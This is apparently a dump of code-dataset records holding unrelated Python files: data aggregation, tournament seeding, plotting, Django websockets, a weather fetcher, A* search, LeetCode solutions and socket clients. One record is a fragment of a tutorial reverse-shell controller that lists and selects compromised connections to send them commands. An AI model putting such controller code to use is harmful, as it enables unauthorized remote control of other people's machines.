TRS(region_sex_df)\n\n marginals_df = pd.concat([pd.DataFrame(data={region_sel: region_dwtype_df.values}, index=region_dwtype_df.index), pd.DataFrame(data={region_sel: region_hhtype_df.values}, index=region_hhtype_df.index), pd.DataFrame(data={region_sel: region_hhsize_df.values}, index=region_hhsize_df.index), pd.DataFrame(data={region_sel: region_age_df.values}, index=region_age_df.index), sex_new_df])\n\n return marginals_df\n\ndef TRS(df):\n\n rd_df = df.apply(np.floor)\n dec_df = df - rd_df\n\n diff = df.sum() - rd_df.sum()\n dec_df = dec_df.transpose()\n sampled = dec_df.sample(int(diff), weights=dec_df, random_state=1)\n\n sampled = sampled.transpose()\n sampled = np.ceil(sampled)\n\n new_df = pd.concat([rd_df, sampled], axis=1)\n new_df = new_df.groupby(new_df.columns, axis=1).sum()\n\n return new_df\n","sub_path":"LSOA_agg.py","file_name":"LSOA_agg.py","file_ext":"py","file_size_in_byte":1879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"533468908","text":"#-*- coding:utf-8 -*-\r\n\r\nimport numpy as np\r\nimport random\r\n\r\ndef Nseed_group(Nseed, ranker_team, team_participant):\r\n #Input\r\n #Nseed: Number of seeds\r\n #ranker_team(vector): seed_team[i] means the team number of the (i+1)th ranker\r\n #team_participant: Number of participants of each teams (NumPy vector)\r\n team_ranker=cal_team_ranker(team_participant.shape[0], ranker_team)\r\n \r\n #Output\r\n #group list\r\n \r\n #get group list including only rankers\r\n group_list=groups_only_ranker(ranker_team)\r\n \r\n #add empty groups (unseed blocks) into group list\r\n group_list=add_empty_groups(group_list, np.max(team_participant))\r\n \r\n #unranker distribution\r\n team_unranker=team_participant-team_ranker ##Number of unrankers of each teams\r\n group_list=dist_unranker(group_list, team_unranker, team_participant)\r\n \r\n return group_list\r\n \r\ndef cal_team_ranker(n_group, ranker_team):\r\n team_ranker=np.zeros(n_group)\r\n \r\n for i in range(n_group):\r\n team_ranker[i]=np.sum(ranker_team==(i+1))\r\n \r\n return team_ranker\r\n\r\ndef NumOfDigits_2(x):\r\n #Input\r\n #x: number\r\n \r\n #Output\r\n #k: the integer as \"2^(k-1) < x <= 2^k\"\r\n \r\n k=1\r\n while pow(2, k)= 2^k between two seed blocks)\r\n \r\n #Output\r\n #\r\n k1=pow(2, NumOfDigits_2(max_team_participant))\r\n k2=len(group_list)\r\n \r\n while k2pow(2, p):\r\n i=0\r\n while i ')\n\n ''' Changing the look of the command prompt - this cmd now is a custom\n command. Not handled by our OS ... handled by whatever we tell it.\n '''\n if cmd == 'list':\n list_connections()\n \n ''' If the user types 'list' the loop continues listing available\n connections until user types something other than 'list'. (We\n still have to build this function 'list_connections')\n '''\n\n elif 'select' in cmd:\n \n ''' this is saying that if the word 'select' is in the command at\n all to run this elif. Because we will type 'select 2' or \n 'select 3' etc. to choose which connection we want to send\n commands to.\n '''\n conn = get_target(cmd)\n \n ''' We have to build this function to actually get this connection\n object. Pass it in this command and extract the ID number and\n get the connection from that.\n '''\n \n if conn is not None:\n \n ''' We want to make sure our target connection is active and \n not None. In case our connection has been lost, or it is\n an old connection, etc.\n '''\n send_target_commands(conn)\n \n ''' We need to build this function so we can control our \n target remotely.\n '''\n \n else:\n print('Command not recognized')\n \n ''' In case of a Typo or something. '''\n \n ","sub_path":"NB_Reverse_Shell/vid_09.py","file_name":"vid_09.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"108885167","text":"import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nplt.style.use('ggplot')\n\n\ndef show_distribution(df, col_names=[], layout=()):\n if len(col_names) == 0:\n raise Exception(\"please supply col_names!\")\n else:\n for col in col_names:\n df[col_names].plot(kind='hist', figsize=(20, 12))\n \n\ndef show_density(df, col_names=[], layout=()):\n if len(col_names) != 0:\n data = df[col_names]\n else:\n numeric_cols = df.columns.values\n data = df[numeric_cols]\n data.plot(kind='density', subplots=True, layout=layout, sharex=False)\n plt.show()\n\n\ndef show_box(df, col_names=[], layout=()):\n if len(col_names) != 0:\n data = df[col_names]\n else:\n numeric_cols = df.columns.values\n data = df[numeric_cols]\n data.plot(kind='box', subplots=True, layout=layout, sharex=False)\n plt.show()\n\n\ndef show_corrMat(df, col_names=[]):\n if len(col_names) != 0:\n data = df[col_names]\n else:\n numeric_cols = df.columns.values\n data = df[numeric_cols]\n corr = data.corr()\n sns.set(font_scale=1)\n sns.heatmap(corr, vmax=.8, square=True, annot=True, fmt='.2f', annot_kws={'size': 7})\n plt.xticks(rotation=90)\n plt.yticks(rotation=0)\n plt.show()\n\n\ndef show_pairplot(df, col_names=[], label_names=None):\n if len(col_names) != 0:\n data = df[col_names]\n sns.pairplot(data, size=2)\n plt.show()\n\n\ndef show_relationshipWithLabel(df, col_names=[], label_names=None, col_types='numeric'):\n if col_types == 'numeric':\n for col in col_names:\n fig, ax = plt.subplots()\n ax.scatter(df[col], df[label_names])\n plt.xlabel(col)\n plt.ylabel(label_names)\n elif col_types == 'categories':\n for col in col_names:\n data = pd.concat([df[label_names], df[col]], axis=1)\n f, ax = plt.subplots()\n fig = sns.boxplot(x=col, y=label_names, data=data)\n plt.show()\n","sub_path":"module/visualise.py","file_name":"visualise.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"317850968","text":"# chat/consumers.py\nimport json\nfrom asgiref.sync import async_to_sync\nfrom channels.generic.websocket import WebsocketConsumer\nfrom django.contrib.auth.models import User\nfrom channels.layers import get_channel_layer\n\n\nclass ChatConsumer(WebsocketConsumer):\n def connect(self):\n print(\"CONNECTED\")\n self.room_name = self.scope['url_route']['kwargs']['room_name']\n self.room_group_name = 'chat_%s' % self.room_name\n self.increment_online_count()\n\n # Join room group\n async_to_sync(self.channel_layer.group_add)(\n self.room_group_name,\n self.channel_name\n )\n\n self.accept()\n async_to_sync(self.channel_layer.group_send)(\n self.room_group_name,\n {\n 'type': 'update_users_online',\n }\n )\n\n def disconnect(self, close_code):\n self.decrement_online_count()\n # Leave room group\n async_to_sync(self.channel_layer.group_send)(\n self.room_group_name,\n {\n 'type': 'update_users_online',\n }\n )\n async_to_sync(self.channel_layer.group_discard)(\n self.room_group_name,\n self.channel_name\n )\n\n # Receive message from room group\n def update_users_online(self, event):\n # Send message to WebSocket\n self.send(text_data=json.dumps({\n 'online_users': self.get_all_online_users_except_self()\n }))\n\n def increment_online_count(self):\n user = self.scope['user']\n user.profile.online_count = user.profile.online_count + 1\n user.profile.save()\n\n def decrement_online_count(self):\n user = self.scope['user']\n if user.profile.online_count > 0:\n user.profile.online_count = user.profile.online_count - 1\n user.profile.save()\n\n def get_all_online_users_except_self(self):\n user = self.scope['user']\n online_users = User.objects.filter(profile__online_count__gt=0).exclude(id=user.id)\n for user in online_users:\n print(str(user))\n serialized_online_users = [online_user.profile.as_dict() for online_user in online_users]\n return serialized_online_users\n\n\nclass GameInviteConsumer(WebsocketConsumer):\n def connect(self):\n self.room_name = self.scope['url_route']['kwargs']['user_id']\n self.room_group_name = 'invite_%s' % self.room_name\n\n # Join room group\n async_to_sync(self.channel_layer.group_add)(\n self.room_group_name,\n self.channel_name\n )\n self.accept()\n\n def disconnect(self, close_code):\n # Leave room group\n async_to_sync(self.channel_layer.group_discard)(\n self.room_group_name,\n self.channel_name\n )\n\n # Receive message from WebSocket\n def receive(self, text_data):\n text_data_json = json.loads(text_data)\n user = text_data_json['user']\n if user and user['id'] and isinstance((user['id']), int):\n\n # Send message to room group\n channel_layer = get_channel_layer()\n async_to_sync(channel_layer.group_send)(\n 'invite_' + str(user['id']),\n {\n 'type': 'receive_invite',\n 'message': 'Invite to checkers from ' + self.scope['user'].username\n }\n )\n\n def receive_invite(self, event):\n self.send(text_data=json.dumps({\n 'message': event['message']\n }))\n","sub_path":"games/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"28385942","text":"from dataclasses import dataclass\nfrom datetime import datetime, timezone\nimport json\nfrom pathlib import Path\nimport pkgutil\nimport re\nfrom typing import Any, Mapping\n\nimport requests\nimport typer\n\napp = typer.Typer()\n\nweather_path = Path.home() / \".cache\" / \"weather.json\"\n\n\n@dataclass\nclass Location:\n station_id: str\n forecast_office_id: str\n forecast_gridpoint_x: int\n forecast_gridpoint_y: int\n\n\nmadison = Location(\n station_id=\"KMSN\",\n forecast_office_id=\"MKX\",\n forecast_gridpoint_x=37,\n forecast_gridpoint_y=63,\n)\n\n\n@dataclass\nclass Forecast:\n high: int\n low: int\n cond: str\n code: int\n day: str\n\n\n@app.command()\ndef get_weather_feature(\n days_out: int = typer.Option(..., \"--days-out\", \"-d\"),\n feature: str = typer.Option(..., \"--feature\", \"-f\"),\n) -> str | float | int:\n \"\"\"Given a number of days_out and a feature, return a single value\n from either the current weather conditions or the forecast.\n\n Args:\n days_out (int):\n A number in the range [0, 3]\n feature (str):\n One of \"Day\", \"Temp\", \"High\", \"Low\",\n \"Cond\", \"Code\", \"Pres\", \"Humi\", \"Wind\"\n\n Returns:\n str | float | int: The value of the feature requested (w/o units)\n \"\"\"\n weather_data = json.loads(weather_path.read_text())\n if feature in [\"Day\", \"High\", \"Low\", \"Code\"]:\n forecast = weather_data[\"forecasts\"][days_out]\n print(forecast[feature])\n elif days_out == 0:\n if feature == \"Temp\":\n print(weather_data[\"current_temperature\"])\n elif feature == \"Pres\":\n print(weather_data[\"current_pressure\"])\n elif feature == \"Humi\":\n print(weather_data[\"current_humidity\"])\n elif feature == \"Wind\":\n print(weather_data[\"current_windspeed\"])\n elif feature == \"Cond\":\n print(weather_data[\"current_condition\"])\n else:\n raise ValueError(f\"Unknown feature ({feature}) for days_out == {days_out}\")\n else:\n raise ValueError(f\"Unknown feature ({feature}) for days_out == {days_out}\")\n\n\n@app.command()\ndef fetch_weather_data(\n station_id: str | None = None,\n forecast_office_id: str | None = None,\n forecast_gridpoint_x: int | None = None,\n forecast_gridpoint_y: int | None = None,\n):\n kwargs = [\n station_id,\n forecast_office_id,\n forecast_gridpoint_x,\n forecast_gridpoint_y,\n ]\n if any(kwarg is None for kwarg in kwargs):\n if any(kwarg is not None for kwarg in kwargs):\n raise ValueError(\"Incomplete argument specification\")\n else:\n location = madison\n else:\n location = Location(\n station_id=station_id,\n forecast_office_id=forecast_office_id,\n forecast_gridpoint_x=forecast_gridpoint_x,\n forecast_gridpoint_y=forecast_gridpoint_y,\n )\n\n current_weather = requests.get(\n f\"https://api.weather.gov/stations/{location.station_id}/observations/latest\"\n ).json()\n forecast = requests.get(\n f\"https://api.weather.gov/gridpoints/{location.forecast_office_id}/{location.forecast_gridpoint_x},{location.forecast_gridpoint_y}/forecast\"\n ).json()\n\n cwp = current_weather[\"properties\"]\n current_temperature = round(cwp[\"temperature\"][\"value\"] * 9 / 5 + 32)\n current_pressure = round(\n cwp[\"barometricPressure\"][\"value\"] * 0.00029529980164712, 2\n )\n current_humidity = round(cwp[\"relativeHumidity\"][\"value\"])\n current_windspeed = round(cwp[\"windSpeed\"][\"value\"] * 0.621371, 2)\n current_condition = cwp[\"textDescription\"]\n forecast_periods = forecast[\"properties\"][\"periods\"]\n tonight_period_number = max(\n [period[\"number\"] for period in forecast_periods if period[\"name\"] == \"Tonight\"]\n )\n\n forecast_days = []\n for day_num in range(3):\n period_1, period_2 = forecast_periods[\n tonight_period_number\n + day_num * 2 : tonight_period_number\n + (day_num + 1) * 2\n ]\n forecast_days.append(extract_forecast_from_period_pair(period_1, period_2))\n\n results = {\n \"current_temperature\": current_temperature,\n \"current_pressure\": current_pressure,\n \"current_humidity\": current_humidity,\n \"current_windspeed\": current_windspeed,\n \"current_condition\": current_condition,\n \"forecasts\": forecast_days,\n \"metadata\": {\n \"fetch_timestamp\": datetime.now(tz=timezone.utc).isoformat(\n timespec=\"seconds\"\n ),\n \"current_weather_generated_at\": cwp[\"timestamp\"],\n \"forecast_generated_at\": forecast[\"properties\"][\"generatedAt\"],\n },\n }\n weather_path.write_text(json.dumps(results, indent=2))\n\n\ndef extract_forecast_from_period_pair(\n period_1: Mapping[str, Any], # the odd period, with the High\n period_2: Mapping[str, Any], # the even period, with the Low\n) -> dict[str, Any]:\n high = period_1[\"temperature\"]\n low = period_2[\"temperature\"]\n cond = period_1[\"shortForecast\"]\n day = period_1[\"name\"][:3]\n icon_url = period_1[\"icon\"]\n r = re.match(\n r\"https:\\/\\/api\\.weather\\.gov\\/icons\\/land\\/(day|night)\\/(\\w*).*\", icon_url\n )\n nws_code = r.group(2)\n nws_to_yahoo_map = json.loads(\n pkgutil.get_data(\"nws_weather\", \"nws_to_yahoo_code_map.json\").decode(\"utf8\")\n )\n yahoo_code = nws_to_yahoo_map[nws_code]\n return {\n \"High\": high,\n \"Low\": low,\n \"Cond\": cond,\n \"Code\": yahoo_code,\n \"Day\": day,\n }\n\n\nif __name__ == \"__main__\":\n app()\n","sub_path":"nws_weather/nws_weather.py","file_name":"nws_weather.py","file_ext":"py","file_size_in_byte":5602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"326354040","text":"from hottbox.core import Tensor, TensorTKD\nfrom hottbox.utils.generation import residual_tensor\n\n\ndef compression_rate(tensor, tensor_rep):\n \"\"\"\n\n Parameters\n ----------\n tensor : Tensor\n tensor_rep : TensorTKD\n\n Returns\n -------\n float\n \"\"\"\n s1 = tensor.size\n s2 = tensor_rep.core.size\n for fmat in tensor_rep.fmat:\n s2 += fmat.size\n return s1 / s2\n\n\ndef print_basic_metrics(tensor, tensor_rep):\n \"\"\"\n\n Parameters\n ----------\n tensor : Tensor\n tensor_rep : TensorTKD\n \"\"\"\n\n rel_error = (residual_tensor(tensor, tensor_rep).frob_norm / tensor.frob_norm) * 100\n comp_rate = compression_rate(tensor, tensor_rep)\n print(\"{}\\n\".format(tensor_rep))\n print(\"Basic metrics:\")\n print(\"--------------\")\n print(\"Compression rate = {:.2f}\\n\".format(comp_rate))\n print(\"Relative error of approximation = {:.2f}%\\n\".format(rel_error))\n","sub_path":"inns/inns/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"494148640","text":"# -*- coding: utf-8 -*-\n\nfrom PyQt5 import QtWidgets, QtCore\nfrom mainwin import Ui_MainWindow\nimport sys\n\nclass MainWindow(QtWidgets.QMainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n\n self.path = QtCore.QDir.rootPath()\n self.model = QtWidgets.QFileSystemModel()\n self.model.setRootPath(self.path)\n self.model.setFilter(QtCore.QDir.Dirs | QtCore.QDir.Files | QtCore.QDir.NoDot)\n self.model.setNameFilterDisables(False)\n\n self.ui.treeView.setSortingEnabled(False)\n self.ui.treeView.setModel(self.model)\n self.ui.treeView.hideColumn(1)\n self.ui.treeView.hideColumn(2)\n self.ui.treeView.hideColumn(3)\n self.ui.treeView.setRootIndex( self.model.index(self.path) )\n\n self.ui.treeView.clicked.connect(self.updateModel)\n self.ui.exportBtn.clicked.connect(self.exportBtnClick)\n self.ui.filterEdit.textChanged.connect(self.onTextChanged)\n\n def updateModel(self, index):\n self.path = self.model.fileInfo(index).filePath()\n if index.data() != '..':\n self.ui.treeView.setRootIndex(index)\n else:\n currentRoot = self.ui.treeView.rootIndex()\n self.ui.treeView.setRootIndex(currentRoot.parent())\n\n def exportBtnClick(self):\n index = self.model.index(self.path)\n rowCount = self.model.rowCount(index)\n file_data = ''\n for i in range(rowCount):\n mi = self.model.index(i, 0, index)\n fileInfo = self.model.fileInfo(mi)\n file_data = ','.join(['%s%s,%s\\n' % (file_data, fileInfo.fileName(), fileInfo.absoluteFilePath())])\n fname = QtWidgets.QFileDialog.getSaveFileName(self, 'Save File', filter='*.csv')\n if fname:\n file = open(fname[0], 'w')\n file.write(file_data)\n file.close()\n\n @QtCore.pyqtSlot(str)\n def onTextChanged(self, txt):\n self.model.nameFilters().clear()\n self.model.setNameFilters(['%s*' % txt])\n if txt == \"\":\n self.model.nameFilters().clear()\n self.model.setNameFilters(['*'])\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication([])\n application = MainWindow()\n application.show()\n\n sys.exit(app.exec())","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"46463850","text":"# from https://medium.com/@nicholas.w.swift/easy-a-star-pathfinding-7e6689c7f7b2\nimport math\n\nclass Node():\n \"\"\"A node class for A* Pathfinding\"\"\"\n\n def __init__(self, parent=None, position=None):\n self.parent = parent\n self.position = position\n\n self.cost = 0\n self.heuristic = 0\n self.total_cost = 0\n\n def __eq__(self, other):\n # print(\"checking node equality\", self.position, other.position)\n return self.position[0] == other.position[0] and self.position[1] == other.position[1] \n\ndef get_distance(x1, y1, x2, y2, technique):\n if technique == \"diagonal\":\n return (x1 - x2)**2 + (y1 - y2)**2 # ((child.position[0] - end_node.position[0]) ** 2) + ((child.position[1] - end_node.position[1]) ** 2)\n \n if technique == \"manhattan\":\n return abs(x1 - x2) + abs(y1 - y2)\n\n\ndef astar(maze, start, end):\n # create start and end node\n start_node = Node(None, start)\n end_node = Node(None, end)\n\n expandedNodes = 0\n\n # initialize lists\n open_list = []\n closed_list = []\n\n # put the start node in the open list\n open_list.append(start_node)\n\n # define looping condition\n # ie. if there are nodes left to open\n # then continue to loop\n has_open_node = len(open_list) > 0\n\n while has_open_node:\n curr_index = 0\n curr_node = open_list[curr_index]\n\n # find the node with the least total_cost\n for index, node in enumerate(open_list):\n if node.total_cost < curr_node.total_cost:\n curr_node = node\n curr_index = index\n\n # pop most recent current node from open list\n # enqueue to closed_list\n open_list.pop(curr_index)\n\n\n closed_list.append(curr_node)\n\n # Found the goal\n if curr_node == end_node:\n path = []\n curr = curr_node\n while curr is not None:\n path.append(curr.position)\n curr = curr.parent\n path.reverse()\n return path, expandedNodes\n\n # initialize children list\n children = []\n\n # set the relative positions of all possible adjacent cells\n # technique is given by Swift, Nicolas\n # from https://medium.com/@nicholas.w.swift/easy-a-star-pathfinding-7e6689c7f7b2\n\n adj_cells = [(-1, -1), (-1, 0), (-1, 1),\n ( 0, -1), (0, 1), \n (1, -1), ( 1, 0), (1, 1)]\n \n for new_position in adj_cells: # adj squares\n\n # Get node position\n curr_x = curr_node.position[0]\n curr_y = curr_node.position[1]\n\n new_x = new_position[0]\n new_y = new_position[1]\n\n node_position = (curr_x + new_x, curr_y + new_y)\n\n # make sure there is no obstacle in this node\n is_walkable = maze[node_position[0]][node_position[1]] == 0\n if not is_walkable:\n continue\n\n # make sure is in range\n is_within_range = node_position[0] > (len(maze) - 1) or node_position[0] < 0 or node_position[1] > (len(maze[len(maze)-1]) -1) or node_position[1] < 0\n if is_within_range:\n continue\n\n # make new node for this adj cell\n new_node = Node(curr_node, node_position)\n\n # add this adj cell to the list of children of the current node\n children.append(new_node)\n\n # Check children\n for child in children:\n for closed_child in closed_list: # for all nodes that have been checked\n if child == closed_child: # check if this node has been checked\n continue # if checked, don't process\n\n # total_cost, cost, and heuristic values\n child.cost = curr_node.cost + 1\n\n # child.heuristic = ((child.position[0] - end_node.position[0]) ** 2) + ((child.position[1] - end_node.position[1]) ** 2)\n child.heuristic = get_distance(child.position[0], child.position[1], end_node.position[0], end_node.position[1], \"diagonal\")\n \n # heuristic could either be chebychev or diagonal\n\n child.total_cost = child.cost + child.heuristic\n\n for open_node in open_list: # if child is in set of points pending opening\n child_is_open = child == open_node\n if child_is_open:\n if child.cost > open_node.cost:\n continue\n\n # Add the child to the open list\n expandedNodes = expandedNodes + 1\n open_list.append(child)","sub_path":"Machine Problems/MP1: Path Planning/astar.py","file_name":"astar.py","file_ext":"py","file_size_in_byte":4631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"46962665","text":"\"\"\"\n39. Combination Sum\n\nGiven an array of distinct integers candidates and a target integer target, return a list of all unique combinations of candidates where the chosen numbers sum to target. You may return the combinations in any order.\n\nThe same number may be chosen from candidates an unlimited number of times. Two combinations are unique if the frequency of at least one of the chosen numbers is different.\n\nIt is guaranteed that the number of unique combinations that sum up to target is less than 150 combinations for the given input.\n\n\n\nExample 1:\n\nInput: candidates = [2,3,6,7], target = 7\nOutput: [[2,2,3],[7]]\nExplanation:\n2 and 3 are candidates, and 2 + 2 + 3 = 7. Note that 2 can be used multiple times.\n7 is a candidate, and 7 = 7.\nThese are the only two combinations.\nExample 2:\n\nInput: candidates = [2,3,5], target = 8\nOutput: [[2,2,2,2],[2,3,3],[3,5]]\nExample 3:\n\nInput: candidates = [2], target = 1\nOutput: []\nExample 4:\n\nInput: candidates = [1], target = 1\nOutput: [[1]]\nExample 5:\n\nInput: candidates = [1], target = 2\nOutput: [[1,1]]\n\n\nConstraints:\n\n1 <= candidates.length <= 30\n1 <= candidates[i] <= 200\nAll elements of candidates are distinct.\n1 <= target <= 500\n\n\"\"\"\n\n\nclass CombinationSum:\n\n \"\"\"\n Approach 1: Backtracking\n Intuition\n\n As a reminder, backtracking is a general algorithm for finding all (or some) solutions to some computational problems. The idea is that it incrementally builds candidates to the solutions, and abandons a candidate (\"backtrack\") as soon as it determines that this candidate cannot lead to a final solution.\n\n Specifically, to our problem, we could incrementally build the combination, and once we find the current combination is not valid, we backtrack and try another option.\n\n Algorithm\n\n As one can see, the above backtracking algorithm is unfolded as a DFS (Depth-First Search) tree traversal, which is often implemented with recursion.\n\n Here we define a recursive function of backtrack(remain, comb, start) (in Python), which populates the combinations, starting from the current combination (comb), the remaining sum to fulfill (remain) and the current cursor (start) to the list of candidates. Note that, the signature of the recursive function is slightly different in Java. But the idea remains the same.\n\n For the first base case of the recursive function, if the remain==0, i.e. we fulfill the desired target sum, therefore we can add the current combination to the final list.\n\n As another base case, if remain < 0, i.e. we exceed the target value, we will cease the exploration here.\n\n Other than the above two base cases, we would then continue to explore the sublist of candidates as [start ... n]. For each of the candidate, we invoke the recursive function itself with updated parameters.\n\n Specifically, we add the current candidate into the combination.\n\n With the added candidate, we now have less sum to fulfill, i.e. remain - candidate.\n\n For the next exploration, still we start from the current cursor start.\n\n At the end of each exploration, we backtrack by popping out the candidate out of the combination.\n\n \"\"\"\n def doit_backtracking(self, candidates: List[int], target: int) -> List[List[int]]:\n\n results = []\n\n def backtrack(remain, comb, start):\n if remain == 0:\n # make a deep copy of the current combination\n results.append(list(comb))\n return\n elif remain < 0:\n # exceed the scope, stop exploration.\n return\n\n for i in range(start, len(candidates)):\n # add the number into the combination\n comb.append(candidates[i])\n # give the current number another chance, rather than moving on\n backtrack(remain - candidates[i], comb, i)\n # backtrack, remove the number from the combination\n comb.pop()\n\n backtrack(target, [], 0)\n\n return results\n\n def doit(self, candidates, target):\n \"\"\"\n :type candidates: List[int]\n :type target: int\n :rtype: List[List[int]]\n \"\"\"\n def search(nums, i, target, cur):\n\n if target == 0:\n res.append(cur)\n return\n\n for j in range(i, len(nums)):\n if target - nums[j] >= 0:\n # next level starting from j, because we wanna same num nums[j]\n search(nums, j, target - nums[j], cur + [nums[j]])\n\n res = []\n search(candidates, 0, target, [])\n return res\n\n\n\"\"\"\n40. Combination Sum II\n\nGiven a collection of candidate numbers (candidates) and a target number (target), \nfind all unique combinations in candidates where the candidate numbers sum to target.\n\nEach number in candidates may only be used once in the combination.\n\nNote: The solution set must not contain duplicate combinations.\n\n \n\nExample 1:\n\nInput: candidates = [10,1,2,7,6,1,5], target = 8\nOutput: \n[\n[1,1,6],\n[1,2,5],\n[1,7],\n[2,6]\n]\nExample 2:\n\nInput: candidates = [2,5,2,1,2], target = 5\nOutput: \n[\n[1,2,2],\n[5]\n]\n \n\nConstraints:\n\n1 <= candidates.length <= 100\n1 <= candidates[i] <= 50\n1 <= target <= 30\n\"\"\"\n\n\nclass CombinationSumII(object):\n\n \"\"\"\n Approach 2: Backtracking with Index\n Intuition\n\n There is another way to adapt the solution of 39. Combination Sum.\n\n Rather than building a counter table to group the numbers together explicitly, we could sort the input, which could also group all the same numbers together.\n\n Similar to the solution of 39. Combination Sum, we iterate through the sorted input array, via backtracking to build the combinations.\n\n In addition, we need to do some tricks with the index of the iteration, in order to avoid generating duplicated combinations.\n\n We demonstrate the idea with the same example in the previous approach, i.e. input = [2, 5, 2, 2].\n\n index demo\n\n As we can see from the above graph, once we sort the input array, the occurrance of each unique number would be adjacent to each other.\n\n In the above graph, we show the moment we start to process the group of number 2, with the iteration index pointed to the beginning of the group.\n\n Next, we need to move the index forward, in order to choose the next number to be added to the combination. More importantly, we need to skip certain positions, in order to avoid the generation of duplicated combinations. We skip the position if the following two condtions are met:\n\n 1). next_curr > curr: we will pick the number at the current curr position into the combination, regardless the other conditions. This is important, since the iteration should allow us to select multiple instances of a unique number into the combination.\n\n 2). candidates[next_curr] == candidates[next_curr-1]: we will skip the occurances all repetitive numbers in-between, e.g. we skip the second and third occurance of number 2 in this round of backtracking.\n\n The combined effects of the above sorting and iterating operations are equivalent to the previous approach with counter table.\n\n Algorithm\n\n It would be clearer to see how the above tricks with index play out in the algorithm.\n\n Similiar to the previous approach, we implement the backtracking process with the function named backtrack(comb, remain, curr, results), but with less parameters, compared to the previous approach.\n\n The bulk of the function remains the same as the solution of 39. Combination Sum, except the specific conditions on the index as we discussed before.\n\n In addition, we optimize the backtracking a bit by adopting the measure of early stopping, i.e. once the sum of current combination exceeds the target, we can stop the exploration for the rest of the numbers. Because all the numbers are positve, as specified in the problem, the sum of combination will increase monotonically. It is needless to explore more combinations whose sum goes beyond the desired target.\n O(2^N)\n \"\"\"\n def doit(self, candidates, target):\n \"\"\"\n :type candidates: List[int]\n :type target: int\n :rtype: List[List[int]]\n \"\"\"\n def dfs(start, target, item):\n if target == 0:\n result.append(item[:])\n return\n\n if target < 0:\n return\n\n for i in range(start, len(candidates)):\n if candidates[i] > target:\n break\n if i > start and candidates[i] == candidates[i - 1]:\n continue\n\n item.append(candidates[i])\n dfs(i + 1, target - candidates[i], item)\n item.pop()\n\n if candidates is None or len(candidates) == 0:\n return [[]]\n\n candidates.sort()\n result = []\n dfs(0, target, [])\n return result","sub_path":"PythonLeetcode/leetcodeM/39_CombinationSum.py","file_name":"39_CombinationSum.py","file_ext":"py","file_size_in_byte":8977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"462192334","text":"# -*- coding:utf-8 -*-\r\nimport json, config\r\nfrom requests_oauthlib import OAuth1Session\r\n\r\n#API認証情報\r\nCK = config.COUSUMER_KEY\r\nCS = config.COUSUMER_SECRET\r\nAT = config.ACCESS_TOKEN\r\nATS = config.ACCESS_TOKEN_SECRET\r\ntwitter = OAuth1Session(CK,CS,AT,ATS)\r\n\r\n#API取得\r\nurl = \"https://api.twitter.com/1.1/search/tweets.json\"\r\n\r\n#検索情報と検索件数の入力\r\nprint(\"何を調べますか?\")\r\nkeyword = input(\">> \")\r\nprint(\"何件表示しますか?\")\r\nnum = input()\r\nprint(\"---------------------------------------\")\r\n\r\n#検索情報と検索件数\r\nparams = {'q' : keyword, 'count' : num}\r\n\r\nreq = twitter.get(url, params = params)\r\n\r\nif req.status_code == 200:\r\n #正常に接続できたら処理をする\r\n search_timeline = json.loads(req.text)\r\n for tweet in search_timeline['statuses']:\r\n print(tweet['user']['name'] + '::' + tweet['text'])\r\n print(tweet['created_at'])\r\n print('------------------------------------')\r\nelse:\r\n print(\"ERROR: %d\" % req.status_code) \r\n\r\n","sub_path":"test/searchtwieet.py","file_name":"searchtwieet.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"49419503","text":"#!/usr/bin/python3\nimport socket, argparse, json, struct, sys\n\nclass Client:\n\n\tdef __init__(self): \n\t\tself.start()\n\n\t# Purpose & Behavior: Uses argparse to process command line arguments into functions \n\t# and their respective inputs. \n\t# Input: Newly created object.\n\t# Output: namespace of command line arguments\n\tdef parse_cmd_arguments(self):\n\t\tparser = argparse.ArgumentParser()\n\t\tparser.add_argument('--server', default='localhost')\n\n\t\tsubparsers = parser.add_subparsers(dest='cmd')\n\n\t\tparser_set = subparsers.add_parser('set')\n\t\tparser_set.add_argument('key', type=str)\n\t\tparser_set.add_argument('val', type=str)\n\n\t\tparser_get = subparsers.add_parser('get')\n\t\tparser_get.add_argument('key', type=str)\n\n\t\tparser_print = subparsers.add_parser('print')\n\t\tparser_print.add_argument('text', nargs=\"*\")\n\n\t\tparser_query = subparsers.add_parser('query_all_keys')\n\n\t\targs = parser.parse_args()\n\t\treturn args\n\n\t# Purpose & Behavior: Starts TCP connection from this client to given server\n\t# Input: Newly created object, and command line argument namespace (args)\n\t# Output: Socket where TCP connection is created.\n\tdef start_connection(self, args):\n\t\t# if the optional argument \"--server\" is used, \n\t\t# then set localhost as this computer's IP. else, return error and exit.\n\t\tif (args.server is not None):\n\t\t\tif (args.cmd is None):\n\t\t\t\tprint (\"RPC command not provided.\")\n\t\t\t\tsys.exit()\n\t\t\t\n\t\tdest_host = str(args.server)\n\t\tdest_port = 38000 # destination port; where TCP connection with server is established\n\t\tsock = None\n\t\ttimeout = 5\n\n\t\t# tries to connect to dest_port; will continue until it either finds an open port or gives up\n\t\twhile (dest_port <= 38010):\n\t\t\tprint('Trying to connect to ' + dest_host + ':' + str(dest_port) + 